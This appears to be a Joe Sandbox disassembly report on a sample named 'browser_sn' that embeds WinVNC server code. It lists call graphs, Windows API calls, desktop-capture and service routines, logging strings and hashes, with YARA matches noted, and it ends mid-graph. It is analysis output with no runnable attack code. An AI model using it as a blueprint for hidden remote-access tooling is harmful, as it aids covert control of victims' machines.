22728->22731 22740 7ff790cc79a0 EnterCriticalSection LeaveCriticalSection CreateSemaphoreA GetLastError RaiseException 22729->22740 22732 7ff790c58988 22731->22732 22736 7ff790c4f840 22731->22736 22733 7ff790ce7220 _getdrive 8 API calls 22732->22733 22734 7ff790c589c3 22733->22734 22737 7ff790c4f885 22736->22737 22741 7ff790cc7b50 EnterCriticalSection 22737->22741 22739 7ff790c4f926 22739->22732 22740->22731 22742 7ff790cc7b6d 22741->22742 22745 7ff790cc7b84 22741->22745 22743 7ff790cf2950 RaiseException 22742->22743 22743->22745 22761 7ff790cf285c 22745->22761 22747 7ff790cc7bc9 GetLastError 22748 7ff790cf2950 RaiseException 22747->22748 22750 7ff790cc7be4 22748->22750 22749 7ff790cc7c18 SetThreadPriority 22751 7ff790cc7c43 ResumeThread 22749->22751 22752 7ff790cc7c27 GetLastError 22749->22752 22750->22749 22753 7ff790cf2950 RaiseException 22750->22753 22757 7ff790cc7c0b 22750->22757 22755 7ff790cc7c52 GetLastError 22751->22755 22756 7ff790cc7c6e LeaveCriticalSection 22751->22756 22754 7ff790cf2950 RaiseException 22752->22754 22753->22757 22758 7ff790cc7c42 22754->22758 22759 7ff790cf2950 RaiseException 22755->22759 22756->22739 22757->22749 22758->22751 22760 7ff790cc7c6d 22759->22760 22760->22756 22762 7ff790cf289c 22761->22762 22763 7ff790cf2887 22761->22763 22767 7ff790cf32ec _getdrive 70 API calls 22762->22767 22764 7ff790ceffc8 _errno 70 API calls 22763->22764 22765 7ff790cf288c 22764->22765 22766 7ff790cf49d4 _invalid_parameter_noinfo 17 API calls 22765->22766 22768 7ff790cc7bb9 22766->22768 22769 7ff790cf28b0 22767->22769 22768->22747 22768->22750 22770 7ff790cf2920 22769->22770 22779 7ff790cf3848 22769->22779 22772 7ff790ce8bf4 free 70 API calls 22770->22772 22774 7ff790cf2928 22772->22774 22774->22768 22784 7ff790cf0008 70 API calls 2 library calls 22774->22784 22775 7ff790cf370c __doserrno 70 API calls 22776 7ff790cf28cc CreateThread 22775->22776 22776->22768 22778 7ff790cf2918 GetLastError 22776->22778 22778->22770 22780 7ff790cf37c4 __doserrno 70 API calls 22779->22780 22781 7ff790cf3853 22780->22781 22782 7ff790cf28bd 22781->22782 22785 7ff790ceaf34 70 API calls 5 library calls 22781->22785 22782->22775 22784->22768 22785->22782 23288 7ff790c654a0 109 API calls 4 library calls 23289 7ff790c65ca0 331 API calls 4 library calls 23291 7ff790c4cca0 115 API calls 23296 7ff790c400d0 88 API calls 2 library calls 23297 7ff790c328d0 81 API calls 23298 7ff790c58ed0 127 API calls _getdrive 22931 7ff790c536d0 SetErrorMode 22932 7ff790c53734 22931->22932 22933 7ff790c33730 _RunAllParam 89 API calls 22932->22933 22934 7ff790c53764 GetCurrentThreadId GetThreadDesktop 22933->22934 22935 7ff790c53799 22934->22935 23057 7ff790c533a0 22935->23057 22936 7ff790c537b4 22937 7ff790c539df 22936->22937 23069 7ff790c4f940 22936->23069 22941 7ff790ce7220 _getdrive 8 API calls 22937->22941 22939 7ff790c539ea 22940 7ff790c33730 _RunAllParam 89 API calls 22939->22940 22947 7ff790c53a11 22940->22947 22942 7ff790c57ff0 22941->22942 22943 7ff790c537ce 23085 7ff790ce851c 22943->23085 22945 7ff790c53825 22946 7ff790ce92a4 __wtomb_environ 70 API calls 22945->22946 22948 7ff790c53838 22946->22948 22952 7ff790c57ef3 22947->22952 22954 7ff790c9d170 2 API calls 22947->22954 22949 7ff790ce92a4 __wtomb_environ 70 API calls 22948->22949 22950 7ff790c53842 22949->22950 23091 7ff790c9a320 22950->23091 22952->22937 22955 7ff790c33730 _RunAllParam 89 API calls 22952->22955 22956 7ff790c53a76 22954->22956 22970 7ff790c57f3e 22955->22970 22958 7ff790c33730 _RunAllParam 89 API calls 22956->22958 22957 7ff790c53867 22961 7ff790ce8bf4 free 70 API calls 22957->22961 22967 7ff790c53874 22957->22967 22960 7ff790c53a8e timeGetTime 22958->22960 22959 7ff790ce8bf4 free 70 API calls 22959->22957 22962 7ff790c53aaf 22960->22962 22961->22967 23106 7ff790c95f30 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 22962->23106 22963 7ff790c53905 22968 7ff790c33730 _RunAllParam 89 API calls 22963->22968 22965 7ff790c538d0 SleepEx 22965->22937 22965->22967 22966 7ff790c53abc 22969 7ff790c53ac0 EnterCriticalSection 22966->22969 22973 7ff790c53b17 _vsnprintf_l 22966->22973 22967->22937 22967->22963 22967->22965 22982 7ff790c53947 22968->22982 22975 7ff790c53af7 22969->22975 23113 7ff790c9ab00 95 API calls _RunAllParam 22970->23113 22974 7ff790c53bd1 GetComputerNameA 22973->22974 22976 7ff790c53c52 22974->22976 22984 7ff790c53bec 22974->22984 23107 7ff790c4aed0 89 API calls _vsnprintf_l 22975->23107 22978 7ff790c53c83 gethostname 22976->22978 22987 7ff790c53c57 22976->22987 22980 7ff790c53caf 22978->22980 22978->22987 22979 7ff790c53b0d LeaveCriticalSection 22979->22973 23109 7ff790c53220 71 API calls 2 library calls 22980->23109 23096 7ff790c9a290 22982->23096 23108 7ff790ce8e5c 70 API calls 4 library calls 22984->23108 22986 7ff790c539c2 22986->22937 22988 7ff790c33730 _RunAllParam 89 API calls 22986->22988 23110 7ff790c9d710 15 API calls 22987->23110 22988->22937 22990 7ff790c53ec4 22990->22937 23111 7ff790c9d600 14 API calls 22990->23111 22992 7ff790c53eed 22992->22937 22993 7ff790c33730 _RunAllParam 89 API calls 22992->22993 22994 7ff790c53f0d EnterCriticalSection 22993->22994 22996 7ff790ce92a4 __wtomb_environ 70 API calls 22994->22996 22997 7ff790c53f5f CreateRectRgn 22996->22997 22998 7ff790c53f95 DeleteObject 22997->22998 22999 7ff790ce8bf4 free 70 API calls 22998->22999 23000 7ff790c53faa LeaveCriticalSection 22999->23000 23112 7ff790cc7d90 EnterCriticalSection SetThreadPriority GetLastError LeaveCriticalSection RaiseException 23000->23112 23058 7ff790c533c1 23057->23058 23059 7ff790c9d170 2 API calls 23058->23059 23060 7ff790c533cf 23059->23060 23061 7ff790c533d3 GetLastError 23060->23061 23062 7ff790c533f1 23060->23062 23063 7ff790c33730 _RunAllParam 89 API calls 23061->23063 23064 7ff790c53441 23062->23064 23067 7ff790c33730 _RunAllParam 89 API calls 23062->23067 23063->23062 23065 7ff790c33730 _RunAllParam 89 API calls 23064->23065 23068 7ff790c5349e 23064->23068 23066 7ff790c5351a 23065->23066 23066->22936 23067->23064 23068->22936 23075 7ff790c4f980 23069->23075 23071 7ff790c4fb49 23074 7ff790ce7220 _getdrive 8 API calls 23071->23074 23072 7ff790c4fae6 SleepEx 23072->23075 23073 7ff790c4fb50 23073->23071 23129 7ff790ce8bbc 70 API calls swscanf 23073->23129 23077 7ff790c4fc50 23074->23077 23075->23071 23075->23072 23075->23073 23079 7ff790c4fa11 23075->23079 23080 7ff790c4fa5e EnterCriticalSection 23075->23080 23114 7ff790ce7c50 23075->23114 23120 7ff790c9d1f0 GetTickCount 23075->23120 23077->22939 23077->22943 23079->23072 23079->23075 23128 7ff790c9d890 97 API calls _RunAllParam 23079->23128 23083 7ff790c4fa91 LeaveCriticalSection 23080->23083 23082 7ff790c4fb8c 23082->23071 23084 7ff790c33730 _RunAllParam 89 API calls 23082->23084 23083->23075 23084->23071 23087 7ff790ce854e _vsnprintf_l 23085->23087 23086 7ff790ceffc8 _errno 70 API calls 23088 7ff790ce8558 23086->23088 23087->23086 23090 7ff790ce8563 23087->23090 23089 7ff790cf49d4 _invalid_parameter_noinfo 17 API calls 23088->23089 23089->23090 23090->22945 23092 7ff790c9a340 FindWindowExA 23091->23092 23093 7ff790c53856 23092->23093 23094 7ff790c9a35d GetWindowThreadProcessId GetCurrentProcessId 23092->23094 23093->22957 23093->22959 23093->22967 23094->23092 23095 7ff790c9a37c PostMessageA 23094->23095 23095->23093 23097 7ff790c9a2b0 23096->23097 23098 7ff790c9a303 23096->23098 23097->23098 23099 7ff790c9a2b9 FindWindowA 23097->23099 23102 7ff790c9a340 FindWindowExA 23098->23102 23100 7ff790c9a2dd PostMessageA 23099->23100 23101 7ff790c9a2cd 23099->23101 23100->22986 23101->22986 23103 7ff790c9a392 23102->23103 23104 7ff790c9a35d GetWindowThreadProcessId GetCurrentProcessId 23102->23104 23103->22986 23104->23102 23105 7ff790c9a37c PostMessageA 23104->23105 23105->23103 23106->22966 23107->22979 23108->22976 23109->22987 23110->22990 23111->22992 23113->22937 23115 7ff790ce7c83 _vsnprintf_l 23114->23115 23116 7ff790ceffc8 _errno 70 API calls 23115->23116 23119 7ff790ce7c98 23115->23119 23117 7ff790ce7c8d 23116->23117 23118 7ff790cf49d4 _invalid_parameter_noinfo 17 API calls 23117->23118 23118->23119 23119->23075 23121 7ff790c9d22f 23120->23121 23124 7ff790c9d2b6 23120->23124 23122 7ff790c9dd90 11 API calls 23121->23122 23126 7ff790c9d25b 23122->23126 23123 7ff790c9d25f 23123->23075 23124->23123 23125 7ff790c9dd90 11 API calls 23124->23125 23125->23123 23126->23123 23126->23124 23127 7ff790c9dd90 11 API calls 23126->23127 23127->23126 23128->23079 23129->23082 23300 7ff790c47ac0 10 API calls _RunAllParam 23303 7ff790c592c0 119 API calls _RunAllParam 23305 7ff790c5f8c0 72 API calls _getdrive 23306 7ff790c522c0 114 API calls 5 library calls 23309 7ff790c42a6e SetServiceStatus SetEvent SetEvent 23310 7ff790c54003 236 API calls 2 library calls 23313 7ff790c31a70 CloseClipboard 23314 7ff790c58a70 133 API calls 4 library calls 23319 7ff790c35a60 25 API calls 2 library calls 23321 7ff790c33e60 34 API calls 23322 7ff790c36060 112 API calls 2 library calls 23323 7ff790c65a60 8 API calls 23325 7ff790c63460 122 API calls 2 library calls 23326 7ff790c59060 129 API calls 23329 7ff790c4a890 97 API calls 2 library calls 23331 7ff790c95e80 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 23334 7ff790c42880 196 API calls 23335 7ff790c3d880 6 API calls _RunAllParam 23336 7ff790c5a085 98 API calls 23337 7ff790c59480 117 API calls _RunAllParam 23339 7ff790cec034 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 23340 7ff790c54003 222 API calls 3 library calls 23343 7ff790c3a830 91 API calls 2 library calls 23344 7ff790c63430 201 API calls 23348 7ff790c3d820 8 API calls _RunAllParam 23349 7ff790c5a420 15 API calls _getdrive 23350 7ff790c51620 150 API calls 5 library calls 23351 7ff790c42a50 SetServiceStatus 23352 7ff790c31450 RaiseException 23356 7ff790c54003 208 API calls 2 library calls 23357 7ff790c54003 242 API calls 3 library calls 23358 7ff790c61440 126 API calls _RunAllParam 23359 7ff790c65040 SetRectRgn CombineRgn DeleteObject

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 7ff790c536d0-7ff790c537b6 SetErrorMode call 7ff790c33730 GetCurrentThreadId GetThreadDesktop call 7ff790c533a0 8 7ff790c537bc-7ff790c537c8 call 7ff790c4f940 0->8 9 7ff790c57fb4-7ff790c57fd3 0->9 12 7ff790c537ce-7ff790c537e0 8->12 13 7ff790c539ea-7ff790c53a33 call 7ff790c33730 8->13 14 7ff790c57fe1-7ff790c58010 call 7ff790ce7220 9->14 15 7ff790c537fe-7ff790c5380d 12->15 16 7ff790c537e2-7ff790c537f3 12->16 26 7ff790c53a39-7ff790c53abe call 7ff790c9d170 call 7ff790c33730 timeGetTime call 7ff790c95f30 13->26 27 7ff790c57ef3-7ff790c57f11 13->27 22 7ff790c53814-7ff790c53858 call 7ff790ce851c call 7ff790ce92a4 * 2 call 7ff790c9a320 15->22 16->15 19 7ff790c537f5-7ff790c537fc 16->19 19->22 44 7ff790c5385a-7ff790c5385d 22->44 45 7ff790c53874-7ff790c538ad 22->45 71 7ff790c53b17-7ff790c53bea call 7ff790c64bc0 call 7ff790cf4a10 GetComputerNameA 26->71 72 7ff790c53ac0-7ff790c53b11 EnterCriticalSection call 7ff790c4aed0 LeaveCriticalSection 26->72 27->14 38 7ff790c57f17-7ff790c57f23 27->38 38->14 40 7ff790c57f29-7ff790c57fb2 call 7ff790c33730 call 7ff790c9ab00 38->40 40->14 48 7ff790c53867-7ff790c5386a 44->48 49 7ff790c5385f-7ff790c53862 call 7ff790ce8bf4 44->49 45->14 60 7ff790c538b3-7ff790c538c8 45->60 48->45 52 7ff790c5386c-7ff790c5386f call 7ff790ce8bf4 48->52 49->48 52->45 61 7ff790c538ca 60->61 62 7ff790c53905-7ff790c53926 60->62 64 7ff790c538d0-7ff790c538e4 SleepEx 61->64 65 7ff790c53928 62->65 66 7ff790c53932-7ff790c539bd call 7ff790c33730 call 7ff790c9a290 62->66 64->14 69 7ff790c538ea-7ff790c53903 64->69 65->66 109 7ff790c539c2-7ff790c539c4 66->109 69->62 69->64 84 7ff790c53c5c-7ff790c53c7d 71->84 85 7ff790c53bec-7ff790c53c04 71->85 72->71 90 7ff790c53c83-7ff790c53c9c gethostname 84->90 88 7ff790c53c06 85->88 89 7ff790c53c41-7ff790c53c55 call 7ff790ce8f48 85->89 94 7ff790c53c10-7ff790c53c3f call 7ff790cea120 88->94 89->90 104 7ff790c53c57 89->104 92 7ff790c53c9e-7ff790c53cad call 7ff790ce85e0 90->92 93 7ff790c53caf-7ff790c53cb6 call 7ff790c53220 90->93 102 7ff790c53cbb-7ff790c53cd4 92->102 93->102 94->89 107 7ff790c53d53-7ff790c53d80 102->107 108 7ff790c53cd6-7ff790c53cdf 102->108 104->107 111 7ff790c53da2-7ff790c53dbf 107->111 112 7ff790c53d82-7ff790c53da0 107->112 108->107 110 7ff790c53ce1-7ff790c53ce3 108->110 109->14 113 7ff790c539ca-7ff790c539e5 call 7ff790c33730 109->113 110->107 114 7ff790c53ce5-7ff790c53d15 110->114 115 7ff790c53dc2-7ff790c53ec6 call 7ff790c9d710 111->115 112->115 113->14 117 7ff790c53d20-7ff790c53d2d 114->117 115->9 122 7ff790c53ecc-7ff790c53ed8 115->122 117->117 121 7ff790c53d2f-7ff790c53d50 117->121 121->107 122->9 123 7ff790c53ede-7ff790c53eef call 7ff790c9d600 122->123 123->9 126 7ff790c53ef5-7ff790c53fff call 7ff790c33730 EnterCriticalSection call 7ff790ce92a4 CreateRectRgn DeleteObject call 7ff790ce8bf4 LeaveCriticalSection call 7ff790cc7d90 123->126 139 7ff790c54003-7ff790c54016 126->139 141 7ff790c5401c-7ff790c54023 call 7ff790c9a5b0 139->141 142 7ff790c540d1-7ff790c540dd 139->142 141->142 152 7ff790c54029-7ff790c54045 call 7ff790c33730 141->152 144 7ff790c540f7-7ff790c540fc 142->144 145 7ff790c540df-7ff790c540e2 142->145 146 7ff790c540fe-7ff790c5412f call 7ff790c62220 call 7ff790c995d0 144->146 147 7ff790c54134-7ff790c54159 call 7ff790c62220 144->147 145->144 149 7ff790c540e4-7ff790c540f2 call 7ff790c531b0 * 2 145->149 146->147 159 7ff790c541ee-7ff790c541fa 147->159 160 7ff790c5415f-7ff790c5418f call 7ff790c5c590 147->160 149->144 152->142 168 7ff790c5404b-7ff790c54094 call 7ff790c33730 * 2 OpenInputDesktop 152->168 164 7ff790c541fc-7ff790c54203 159->164 165 7ff790c5421d-7ff790c54225 159->165 179 7ff790c541e4-7ff790c541e9 160->179 180 7ff790c54191-7ff790c5419b 160->180 164->165 169 7ff790c54205-7ff790c54218 call 7ff790c5c590 164->169 170 7ff790c5426d-7ff790c54270 165->170 171 7ff790c54227-7ff790c54253 165->171 196 7ff790c5409a-7ff790c540b0 call 7ff790c33730 call 7ff790c9a3b0 168->196 197 7ff790c57c66 168->197 169->165 177 7ff790c54284-7ff790c54286 170->177 178 7ff790c54272-7ff790c5427f call 7ff790c5c6f0 170->178 175 7ff790c54268 171->175 176 7ff790c54255-7ff790c54263 call 7ff790c9d440 171->176 175->170 176->175 183 7ff790c54288-7ff790c542a4 177->183 184 7ff790c542c6-7ff790c542db 177->184 178->177 179->159 180->179 187 7ff790c5419d-7ff790c541bd GetTickCount 180->187 189 7ff790c542b6-7ff790c542c1 183->189 190 7ff790c542a6-7ff790c542b1 call 7ff790c9d440 183->190 191 7ff790c542dd-7ff790c542e1 184->191 192 7ff790c5431e-7ff790c54337 call 7ff790c9d890 184->192 187->179 194 7ff790c541bf-7ff790c541cf 187->194 189->184 190->189 191->192 199 7ff790c542e3-7ff790c542f8 191->199 207 7ff790c5433d-7ff790c54347 192->207 208 7ff790c57c78-7ff790c57c7f 192->208 194->179 195 7ff790c541d1-7ff790c541df call 7ff790c9d440 194->195 195->179 226 7ff790c57c47-7ff790c57c52 CloseDesktop 196->226 227 7ff790c540b6-7ff790c540bd 196->227 204 7ff790c57c6d call 7ff790c33730 197->204 199->192 213 7ff790c542fa-7ff790c54313 call 7ff790c9d890 199->213 216 7ff790c57c72 204->216 214 7ff790c5438b-7ff790c54393 207->214 215 7ff790c54349-7ff790c57bb2 call 7ff790c9d170 call 7ff790c5b1f0 LeaveCriticalSection 207->215 210 7ff790c57c95-7ff790c57ca4 208->210 211 7ff790c57c81-7ff790c57c8f Sleep 208->211 217 7ff790c57cf7-7ff790c57d06 210->217 218 7ff790c57ca6-7ff790c57ce4 FlushFileBuffers 210->218 211->210 213->208 236 7ff790c54319-7ff790c5431c 213->236 220 7ff790c57c01-7ff790c57c14 214->220 215->220 216->208 224 7ff790c57d08-7ff790c57d46 FlushFileBuffers 217->224 225 7ff790c57d59-7ff790c57d71 call 7ff790c9a3b0 217->225 218->217 223 7ff790c57ce6-7ff790c57cec CloseHandle 218->223 239 7ff790c57c23-7ff790c57c25 220->239 240 7ff790c57c16-7ff790c57c1e call 7ff790c5c4e0 220->240 223->217 224->225 230 7ff790c57d48-7ff790c57d4e CloseHandle 224->230 242 7ff790c57d73-7ff790c57d8d call 7ff790c62170 225->242 243 7ff790c57d94-7ff790c57d9b 225->243 226->216 235 7ff790c57c54-7ff790c57c64 226->235 231 7ff790c540c8-7ff790c540cc 227->231 232 7ff790c540bf-7ff790c540c2 CloseDesktop 227->232 230->225 231->142 232->231 235->204 236->207 239->208 245 7ff790c57c27-7ff790c57c42 239->245 240->239 242->243 248 7ff790c57dbc-7ff790c57e13 call 7ff790c33730 GetModuleFileNameA 243->248 249 7ff790c57d9d-7ff790c57da5 CloseDesktop 243->249 245->139 258 7ff790c57e15-7ff790c57e53 call 7ff790cea220 248->258 259 7ff790c57e56-7ff790c57e69 LoadLibraryA 248->259 249->248 250 7ff790c57da7-7ff790c57db7 call 7ff790c33730 249->250 250->248 258->259 261 7ff790c57e6b-7ff790c57e97 GetProcAddress FreeLibrary 259->261 262 7ff790c57e9d-7ff790c57ec0 259->262 261->262 266 7ff790c57edd-7ff790c57ef0 262->266 267 7ff790c57ec2-7ff790c57ed8 call 7ff790c4e580 call 7ff790cc7c90 262->267 266->27 267->266
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Desktop$Thread$CloseCriticalSection$CurrentEnterFilefree$BuffersErrorFlushHandleInputLeaveLibraryNameObjectOpenSleep$AddressComputerCountCreateDeleteFreeInformationLastLoadModeModulePriorityProcRectTickTimeUser_snprintfgethostnametime
                                                      • String ID: ( $ - $Could not connect to %s!$Could not connect using %s!$Host name unavailable$LOGEXIT$WinVNC$\logging.dll$application mode$service mode$vncclient.cpp : PostAddNewClient I$vncclient.cpp : PostAddNewClient II$vncclient.cpp : authenticated connection$vncclient.cpp : client connected : %s (%hd)$vncclient.cpp : client disconnected : %s (%hd)$vncclient.cpp : failed to close desktop$vncclient.cpp : negotiated version$vncclient.cpp : sent pixel format to client$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : PostAddNewClient failed$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
                                                      • API String ID: 459429253-3399855497
                                                      • Opcode ID: c708106eea21312b0ff10812b2299c3caf0780bd7169fe3a5c2cd561237a6d82
                                                      • Instruction ID: d7eca10c8137e4c1bc1bf7bc4a69bd037ce7ae51827cc913cbba458df5a5f805
                                                      • Opcode Fuzzy Hash: c708106eea21312b0ff10812b2299c3caf0780bd7169fe3a5c2cd561237a6d82
                                                      • Instruction Fuzzy Hash: 75A2AD26628A8185E760EB35C848BFEB7A1FF85B94F854232CA1D477E5DF38E445C720

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressLibraryProcProcess$CloseCreateCurrentFirstFreeHandleLoadMetricsProcess32SessionSnapshotSystemToolhelp32
                                                      • String ID: ProcessIdToSessionId$WTSGetActiveConsoleSessionId$explorer.exe$kernel32.dll
                                                      • API String ID: 1881659197-3751679782
                                                      • Opcode ID: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
                                                      • Instruction ID: 91e8bbb0f569948567ced4cadec8c6028761017674ef66aee26b80747b181729
                                                      • Opcode Fuzzy Hash: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
                                                      • Instruction Fuzzy Hash: 09412C32A28B4286EB74AB35A8541A9E3E4FF89790F845135D96E077A4EF3CF505C720

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on , xrefs: 00007FF790C9A01F
                                                      • vncservice.cpp : getusername error %d, xrefs: 00007FF790C9A04A
                                                      • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS , xrefs: 00007FF790C9A094
                                                      • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0, xrefs: 00007FF790C99F7F
                                                      • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user , xrefs: 00007FF790C99FB7
                                                      • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s , xrefs: 00007FF790C9A06F
                                                      • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station , xrefs: 00007FF790C99F3B
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$User$InformationNameObjectProcessRevertSelfStationWindow
                                                      • String ID: vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0$vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s $vncservice.cpp : getusername error %d
                                                      • API String ID: 3635673080-2232443292
                                                      • Opcode ID: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
                                                      • Instruction ID: 209902bd2fbbca93e73538d9ba37316b7fd05d9c4b35a02ec998fdf0a4e8ce30
                                                      • Opcode Fuzzy Hash: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
                                                      • Instruction Fuzzy Hash: 0A416E65E2C54392EB20AB39F8402B9E3A1FF85748FC45031D60D867A5EE3DF585C7A0

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 558 7ff790c39d00-7ff790c39d9b call 7ff790c329a0 561 7ff790c39d9d 558->561 562 7ff790c39db3-7ff790c39dc7 OpenSCManagerA 558->562 565 7ff790c39da0-7ff790c39db1 call 7ff790ce8894 561->565 563 7ff790c39dc9-7ff790c39dce 562->563 564 7ff790c39de0-7ff790c39e25 EnumServicesStatusA 562->564 566 7ff790c39dd9-7ff790c39ddb 563->566 567 7ff790c39dd0-7ff790c39dd4 call 7ff790ce7914 563->567 568 7ff790c39fed-7ff790c39ffc CloseServiceHandle 564->568 569 7ff790c39e2b-7ff790c39e36 GetLastError 564->569 565->562 572 7ff790c3a00b-7ff790c3a031 call 7ff790ce7220 566->572 567->566 574 7ff790c3a007 568->574 575 7ff790c39ffe-7ff790c3a002 call 7ff790ce7914 568->575 569->568 573 7ff790c39e3c-7ff790c39e3f call 7ff790ce71fc 569->573 580 7ff790c39e44-7ff790c39e4e 573->580 574->572 575->574 580->568 582 7ff790c39e54-7ff790c39e8d EnumServicesStatusA 580->582 583 7ff790c39fe5-7ff790c39fe8 call 7ff790ce78d4 582->583 584 7ff790c39e93-7ff790c39e9a 582->584 583->568 584->583 586 7ff790c39ea0 584->586 587 7ff790c39ea3-7ff790c39ea6 586->587 588 7ff790c39eac-7ff790c39ec5 OpenServiceA 587->588 589 7ff790c39fe1 587->589 588->589 590 7ff790c39ecb-7ff790c39edf QueryServiceConfigA 588->590 589->583 591 7ff790c39fc7-7ff790c39fdb CloseServiceHandle 590->591 592 7ff790c39ee5-7ff790c39eee GetLastError 590->592 591->587 591->589 592->591 593 7ff790c39ef4-7ff790c39f02 call 7ff790ce71fc 592->593 593->591 596 7ff790c39f08-7ff790c39f1e QueryServiceConfigA 593->596 597 7ff790c39fbf-7ff790c39fc2 call 7ff790ce78d4 596->597 598 7ff790c39f24-7ff790c39f8d call 7ff790c329a0 call 7ff790c39c80 call 7ff790c3a120 596->598 597->591 606 7ff790c39faf-7ff790c39fb4 598->606 607 